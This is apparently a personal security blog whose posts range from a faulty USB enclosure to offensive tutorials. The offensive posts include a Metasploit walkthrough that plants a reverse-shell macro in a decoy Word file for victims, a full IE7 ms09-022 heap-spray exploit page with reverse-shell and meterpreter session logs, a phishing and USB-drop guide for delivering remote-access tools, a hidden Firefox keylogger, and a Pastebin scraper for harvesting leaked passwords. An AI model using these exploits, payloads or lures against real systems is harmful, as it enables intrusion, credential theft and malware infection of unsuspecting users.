IntelComms

Bootless USB to SATA Controller

2011-11-29T16:52:00.002Z

Last week I bought a 1T USB portable Verbatim case with model#: 53039 and serial#: RP211X102347. The plastic USB case houses a Toshiba hard disk and a USB to SATA controller with serial#: 200514081421.

To my surprise I realised that I was not able to boot my macbook from this external USB disk after installing OS X Lion onto. After several attempts with other working bootable images on different machines, I ended up taking apart the housing and mounting the enclosed Toshiba disk onto my portable SATA to USB Konig adapter kit. This time everything worked perfectly:)

It's was the first time I bought a Verbatim product for a long time now, last time must have been since the end of life of 3,5'' floppy disks and the 100MB ZIP floppies for Iomega drives; I should have stuck with WD or LaCie that do come with decent USB connector to SATA connectors.

23025 Minutes

2011-06-26T22:15:00.004+01:00

After upgrading MacOSX to 10.6.4 iCal's alarm has added two very useful interval reminder options:

"Play sound Basso 23025 minutes after", and
"Play sound Basso 1425 minutes after

23025 / 60 / 24 = 383.75 / 24 = 15.989 days

and 1425 / 60 / 24 = 23.75 / 24 = 0.989 days

Have noticed this for a long time as others...but anyway, here is a screenshot.

Exploits "we will pay for it"

2011-06-13T14:16:00.006+01:00

Q: Do you have a 0-day exploit, please send it to me
A: Sure mate

Pastebin Dumpster Diving

2010-07-30T16:10:00.004+01:00

Many people like the idea behind the popular service Pastebin and the convenience offered on the spot with a couple of mouse clicks, nevertheless even more neglect the fact that any stored information will be publicly available for anyone.

As such, being a regular visitor of Pasterbin I tempt on clicking and viewing the recent posts made by other users and quite often I come across password dumps, lists of email addresses, lists of usernames, database connectivity parameters, internal IP addresses, device configuration files, online conversations, rapidshare links, private FTP/Web servers, and many many more...

So a simple way we could automate the process of visiting Pastebin and download all new posts for a closer lookup at a later time is using the following bash command:

for hash in `curl http://pastebin.com/ | grep clb_top | awk -F "\"" {'print $4'} | awk -F "\/" {'print $4'}`;do wget http://www.pastebin.com/download.php?i=$hash;done

The above can also be saved in a bash script and with the help of cron we could say call it every 1 minute from our home server, during an 8 hour period we will download maximum 3840 files (8 posts/per minute times 8 hours * 60 minutes = 3840 files)

Then, easily using grep we can scan those files for keywords (pass, user, email, @, mysql, connect, ssh, botnet etc) and who knows we might spot something interesting ;)

Ubuntu 10.0.4 - Verify Installation Configuration 800%

2010-06-29T12:47:00.004+01:00

Anyone else noticed that progress bar label goes over 100%?

GoToGoogle - HTTPS

2010-06-10T09:25:00.006+01:00

As Google recently enabled SSL on their search engine, allowing users to access https://www.google.com/ instead of the standard Google search domain, we altered our simple plugin so to open that one; you can get it from he re.

No GUI Firefox Keylogger

2010-04-02T23:01:00.005+01:00

To download please see http://www.intelcomms.net/intelcomms.net/code.php

This plugin is based completely on the Key-logger plugin v1.1 written by arrumi.

What makes this version different is that all GUI items have been removed. The only way to view the captured keystrokes is by accessing the "extensions.integrator.logpref" key in "about:config" as seen in the image.

Hoax - R.I.P. str0ke

2009-11-04T14:31:00.002Z

There was a rumor circulating on the net the last days telling that str0ke had died, thankfully this came up to be another hoax.

. The MS Office, a Macro and a Shell

2009-04-10T16:47:00.008+01:00

In this post we will go through the steps to create a VBA (Visual Basic for Applications) payload using Metasploit Framework and stick that into a Microsoft Office Word 2003 document. When the target users open up the document we will get a command line prompt. The process is divided in four parts.

Part1 - Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V> /var/www/win.sh_rev_tcp.1.108-5000.txt

Part2 - Attacker's end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

[pentester waits here for victim to eat the bait...once file is opened a shell is spawned as follows]

[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo

Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
...
...
C:\Documents and Settings\Administrator>

Part3 - Wrap bait into Office Word document
a. First, we need to copy the contents of file win.sh_rev_tcp.1.108-5000.txt, generated in Part1 over to our Windows machine. Having a web server at the Linux site is always handly, we just opening up Firefox and pointing to http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document, named it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon, the area where you should paste the code will popup in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon at the toolbar, do File | Close and Return to Microsoft Word
g. Add some data to your fishie document so to look genuine, Save and Exit
h. Distribute the document and hold back

* The above also apply for Office Excel documents, however please note that the generated Visual Basic code should be saved into ThisWorkbook item instead of ThisDocument, as per instruction d.

Part4 - Distribution etc
Having done all these, you can send the file as an attachment or save to a shared area where your victims can spot it and fire it up, if their Macro Security (Tools | Macro | Security... ) level is set to low your goal will be achieved instantly. In any other case the users will get a friendly message telling them "The macros in this project are disabled. Please refer to the online help or documentation of the host application to determine how to enable macros." with an OK and Help button, pressing the Help button tells them exactly where to click so to enable macros.

. IM Memory Dumping (cont.)

2009-04-10T00:54:00.005+01:00

(You may want to read first IM Memory Dumping)

According to Wikipedia on April 6th 2007, GAIM's project development team changed the name of the popular IM to Pidgin, as a result of their settlement with AOL and latter's trademarked acronym AIM. So we downloaded Pidgin's latest version 2.5.5 and installed it in our VMware Windows box. We happily added our demo username and password (for our test it does not matter if you tick the box saying remember password, or not, as there is no change in the result of our experiment). Then we dumped Pidgin's process memory, saved it to a file in our Samba share, the file consumed about 50MB of space. From there, using the strings command we searched for sequences of printable characters; by grep-ing for our set password we found three instances of it in different places (all of them of course in plaintext).

We changed our account password a few times and repeated the process again and again, last we concluded that:
1. every time the password was stored three times in the process memory
2. one of the locations is very easily spotted in the dump (if you view the file with a Hex editor you will see that there is always a large block of random data then the string =p&=, then some random numbers (which they do not always appear) and finally our password). As you understand even if you do not know the secret password you can find it by trial and error in just a few tries.

I guess that other IM clients is very likely to store your passwords amongst other information in clear. I can not tell you do not use program X or program Y because they do not properly encrypt your passwords or do not scrub the memory, but I can advise you to take under serious consideration which ones you do use at home and work, and think how much exposed you are.

. IM Memory Dumping

2009-04-06T12:23:00.003+01:00

It was around 2003-2004 years when one day I started playing with the way popular Instant Messengers (IM) clients store user's sensitive information in RAM. I was fan of the opensource Gaim IM, so that was my first nominate.

The procedure I had followed was as follows:
1. Installed Gaim on a Windows box
2. Logged in with a fake MSN account
3. Dump the memory contents of a running process to a file using the PMDump by Arne Vidstrom from ntsecurity group.
4. Opened up the file with a Hex editor and presto the password was there in plaintext, I think it was found in two different places.

Doing a little of search with Google, you can find more memory content extractors, see:
APsoft's memdump - this tool gets you the whole system memory
Metasploit's MemDump - added a few months, offers similar functionalities as the tool PMDump
Microsoft's userdump - generates a user dump of a process by shutting it down, by throwing an exception or by making it stop responding, yes it is a bit aggressive.

Later found, that this is a very common bad-practice, followed by software developers who accidentally or unknowingly fail to scrub the password from a memory buffer after authentication, and sadly many software applications fall to this category; to name a few but not limited to these see PuTTY v0.53b, ActivCard, standalone Flash programs and other IMs.

I think it worths noting here that the problem is even bigger with applications that store user's credentials permanently on the physical disk in unencrypted form, see for exampe the recent Intel BIOS Disclosure and regular security posts regarding web server traversals which may result in arbitrary file access.

Now 5 years or so later, I have decided to repeat the experiment and see if things have changed since then, will blog-post the findings soon.

. ms09-022 IE7 Memory Corruption

2009-04-01T01:06:00.015+01:00

Ok folks, I assume all of you have heard about the Microsoft Internet Explorer Uninitialized Memory Remote Code Execution Vulnerability also known as ms09-022 which has been published on Feb 10 2009. This vulnerability allows remote attackers to execute arbitrary code on Windows systems that are running IE7, the range of the affected systems varies from WinXP SP2 up to Win2K8 (the Server Core installation option is not affected) releases.

As in many classic client-side attacks, end user's interaction is vital so to take control of his system and all our victim needs to do is visit the malicious page. The specific flaw exists in the handling of document objects. In particular, when an object is appended and deleted in a specific order, memory corruption occurs; successful exploitation leads to remote compromise of the affected system under the credentials of the currently logged in user.

Some of you may have already played with it extensively in your labs or in real environments as metasploit, Core Impact, Immunity CANVAS and other frameworks have included this exploit since the early days of its disclosure, however, some others may have difficulties with this one. Ok, enough with the theory, the guys from TippingPoint and the Zero Day Initiative who discovered the vulnerability did the hard work for us, and now have left us to experiment with our creativity. The exploit looks like the code below, the only thing you need to add is the payload in URL encoding scheme which easily can be generated using msfpayload from metasploit framework:

/msfpayload desired_payload LHOST=attacker_ip LPORT=attacker_listening_port J

example: ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 J

-------------code snip-------------
<html>
<script language="JavaScript">

var c=unescape("");//<-------Add your payload here

var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");

while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;

</script>
<script>window.setTimeout("ok();",800);</script>
</html>
-------------code snip-------------

Then save the page in html, prepare your netcat listener on port 4444 and trick your victim to open the html file. If you prefare, you can always use more advanced payloads such as meterpreter, in addition, if you target more than one users you should consider using the multi/handler module.

-------------example snip-------------
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.133:1053)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim1\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.133
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\victim1\Desktop>
-------------example snip-------------

Or you can use msfconsole exclusively; note that we chose to use the meterpreter payload, just for change:

-------------example snip-------------
msf > use windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > set SRVHOST 192.168.1.100
SRVHOST => 192.168.1.100
msf exploit(ms09_002_memory_corruption) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(ms09_002_memory_corruption) > set URIPATH ms09-22.html
URIPATH => test.html
msf exploit(ms09_002_memory_corruption) > set TARGET 0
TARGET => 0
msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms09_002_memory_corruption) > set LPORT 9898
LPORT => 9898
msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://192.168.1.100:8888/ms09-22.html
[*] Server started.

//at this point the victim clicks on the URL: http://192.168.1.100:8888/ms09-22.html

msf exploit(ms09_002_memory_corruption) >
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.105:1060...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.100:9898 -> 192.168.1.105:1061)

msf exploit(ms09_002_memory_corruption) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.100:9898 -> 192.168.1.105:1061

msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-XPSP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >
-------------example snip-------------

. CSAM - Phishie Methods

2009-04-01T00:29:00.010+01:00

Client-Side Attack Methods - Tricking users to execute our RAT

Depending on the type of attack we are performing, ie targeted (T) or non-targeted (NT), we can try the following phishie methods against our targets:

Send an email to the victim asking to visit a link.
Send an email to the victim having the malicious file attached into.
Leave near the company a couple of USB pendrives loaded with your juicy files, a VBA macro embedded in a MSOffice Word document, a trapped PDF file, a single HTML page that triggers an known vulnerability the list can easily go on.
If company's employees are using social networks you can join the group, create a good fictitious scenario and ask them to visit your link.
If you have access to an open shared directory you can leave your file there, give it a nice attractive name, or masquerade its icons, or merge the file into another naive file.

For those cases where you have to distribute your malicious files via a link, you can:

Host your files on your own machine
Host the files into an already compromised box
Use TinyURL to soft-hide destinations of the link from unsuspecting users
Use an online file hosting provider such as RapidShare
If in a LAN environment, you can create a UNC shortcut which points to your files in the web.
If you know their mobile numbers you can always text them the link, or using some social engineering you can pretend that you are one of their colleagues who has just changed mobile number and you just asking the victim to check fileXYZ which is located in their open shared directory if it loads OK blah blah...you get the idea.
Read the book "The Art of Deception" to get an idea how the users can be tricked and understand the saying "your weakest link is the human factor".